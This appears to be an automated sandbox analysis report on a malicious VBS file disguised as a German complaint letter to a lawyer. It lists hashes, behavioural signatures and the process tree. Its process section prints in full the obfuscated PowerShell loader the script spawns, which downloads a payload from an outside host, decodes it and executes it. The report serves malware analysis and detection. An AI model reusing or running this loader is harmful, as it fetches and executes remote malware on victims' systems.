Analysis
-
max time kernel
298s -
max time network
299s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-10-2024 15:41
Static task
static1
Behavioral task
behavioral1
Sample
08102024_1541_Beschwerde-Rechtsanwalt.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
08102024_1541_Beschwerde-Rechtsanwalt.vbs
Resource
win10v2004-20241007-en
General
-
Target
08102024_1541_Beschwerde-Rechtsanwalt.vbs
-
Size
11KB
-
MD5
a7f87588bc5a6ad03f79fa3085be9d28
-
SHA1
c79dd84cd67b0846050b112ab4ce4b8c2f70794d
-
SHA256
5700a6ed9522d53708f6e93c1303b25bcd9ede837dc6a5c62f929db1a8d4a59c
-
SHA512
00dfd74685a88acb05970cfed07e5edbb605419f1ca4d8c0703ecb5dd436ef8b729c25bc5316e188d80c762a2f5b4a68a4b61b4dea8d7f1a50f477e76695bd21
-
SSDEEP
192:RXVmQSH8ZNUYCxEXHnas8BK1gF8ylvACz74VT4DNIO+LtbA/ziLrRtEpDCBMjd/8:11SIxC+X91gZ/+pwz3wb
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
flow pid Process 2 2792 WScript.exe 7 2584 powershell.exe 8 2584 powershell.exe 9 2584 powershell.exe 10 2584 powershell.exe 11 2584 powershell.exe 12 2584 powershell.exe 13 2584 powershell.exe 14 2584 powershell.exe 15 2584 powershell.exe 16 2584 powershell.exe 17 2584 powershell.exe 18 2584 powershell.exe 19 2584 powershell.exe 20 2584 powershell.exe 21 2584 powershell.exe 22 2584 powershell.exe 23 2584 powershell.exe 24 2584 powershell.exe 25 2584 powershell.exe 26 2584 powershell.exe 27 2584 powershell.exe 28 2584 powershell.exe 29 2584 powershell.exe 30 2584 powershell.exe 31 2584 powershell.exe 32 2584 powershell.exe 33 2584 powershell.exe 34 2584 powershell.exe 35 2584 powershell.exe 36 2584 powershell.exe 37 2584 powershell.exe 38 2584 powershell.exe 39 2584 powershell.exe 40 2584 powershell.exe 41 2584 powershell.exe 42 2584 powershell.exe 43 2584 powershell.exe 44 2584 powershell.exe 45 2584 powershell.exe 46 2584 powershell.exe 47 2584 powershell.exe 48 2584 powershell.exe 49 2584 powershell.exe 50 2584 powershell.exe 51 2584 powershell.exe 52 2584 powershell.exe 53 2584 powershell.exe 54 2584 powershell.exe 55 2584 powershell.exe 56 2584 powershell.exe 57 2584 powershell.exe 58 2584 powershell.exe 59 2584 powershell.exe 60 2584 powershell.exe 61 2584 powershell.exe 62 2584 powershell.exe 63 2584 powershell.exe 64 2584 powershell.exe 65 2584 powershell.exe 66 2584 powershell.exe 67 2584 powershell.exe 68 2584 powershell.exe 69 2584 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2584 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2584 2792 WScript.exe 28 PID 2792 wrote to memory of 2584 2792 WScript.exe 28 PID 2792 wrote to memory of 2584 2792 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08102024_1541_Beschwerde-Rechtsanwalt.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b